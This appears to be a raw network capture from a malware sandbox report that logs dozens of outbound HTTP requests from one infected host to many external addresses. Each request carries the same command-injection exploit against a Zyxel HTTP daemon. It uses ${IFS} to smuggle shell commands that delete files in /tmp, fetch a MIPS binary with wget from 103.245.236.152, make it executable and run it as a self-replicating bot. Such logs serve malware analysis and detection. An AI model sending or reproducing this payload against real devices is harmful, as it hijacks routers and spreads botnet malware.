                                      Jan 14, 2024 15:50:38.095743895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2143192.168.2.143949066.119.59.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095803976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2144192.168.2.1460536122.2.158.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095830917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2145192.168.2.144613883.247.223.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095861912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2146192.168.2.1459492183.231.91.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095896006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2147192.168.2.144815689.109.0.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095933914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2148192.168.2.1449558196.243.250.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095993042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2149192.168.2.1454946206.75.164.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096038103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2150192.168.2.144173419.90.213.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096075058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2151192.168.2.1444068155.49.146.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096123934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2152192.168.2.1455516192.245.198.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096154928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2153192.168.2.14601142.49.141.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096210957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2154192.168.2.1435266126.99.184.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096262932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2155192.168.2.1435548217.8.112.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096301079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2156192.168.2.1440866162.191.246.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096338034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2157192.168.2.1444650154.143.224.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096369982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2158192.168.2.144360097.14.205.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096404076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2159192.168.2.144365045.71.79.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096424103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2160192.168.2.145887623.246.36.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096460104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2161192.168.2.145639664.72.244.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096513033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2162192.168.2.1435254104.237.82.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096549034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2163192.168.2.1442812175.129.200.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096592903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2164192.168.2.1459556160.17.68.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096642017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2165192.168.2.1454382157.19.161.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096673012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2166192.168.2.1450284176.224.151.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096704006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2167192.168.2.1436158124.196.178.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096745968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2168192.168.2.1438360195.239.113.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096782923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2169192.168.2.1436074146.221.130.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096817017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2170192.168.2.1440734117.143.142.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096863985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2171192.168.2.1433514163.158.126.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096904039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2172192.168.2.1435586152.41.51.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096935034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2173192.168.2.144930691.51.192.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.096981049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2174192.168.2.1436308207.151.81.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097024918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2175192.168.2.143295284.72.1.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097074032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2176192.168.2.14554209.79.47.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097099066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2177192.168.2.144695064.52.115.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097131968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2178192.168.2.1454274139.139.156.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097182989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2179192.168.2.146078839.177.16.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097214937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2180192.168.2.1444024120.141.164.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097268105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2181192.168.2.1436548189.204.142.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097296953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2182192.168.2.1433860117.91.206.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097359896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2183192.168.2.1457362211.200.184.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097413063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2184192.168.2.1439638175.48.15.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097441912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2185192.168.2.1442656156.95.40.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097475052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2186192.168.2.143476234.60.137.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097510099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2187192.168.2.144115670.195.201.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097551107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2188192.168.2.144667637.152.89.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097584009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2189192.168.2.1444848131.190.121.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097626925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2190192.168.2.1437096121.123.3.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097645998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2191192.168.2.144396657.195.75.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097673893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2192192.168.2.144409454.23.206.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097719908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2193192.168.2.1457740161.6.85.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097767115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2194192.168.2.144899686.41.176.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097804070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2195192.168.2.1442070203.191.154.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097847939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2196192.168.2.1432884216.1.70.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097873926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2197192.168.2.144314287.73.223.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097908020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2198192.168.2.1449376208.158.105.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097939968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2199192.168.2.1447714213.106.75.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.097990036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2200192.168.2.144398091.207.78.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098033905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2201192.168.2.1438054147.227.241.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098078012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2202192.168.2.145976841.142.41.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098115921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2203192.168.2.1460514200.131.78.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098151922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2204192.168.2.144445014.103.82.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098185062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2205192.168.2.144697658.43.178.131443
                                      TimestampBytes transferredDirectionData
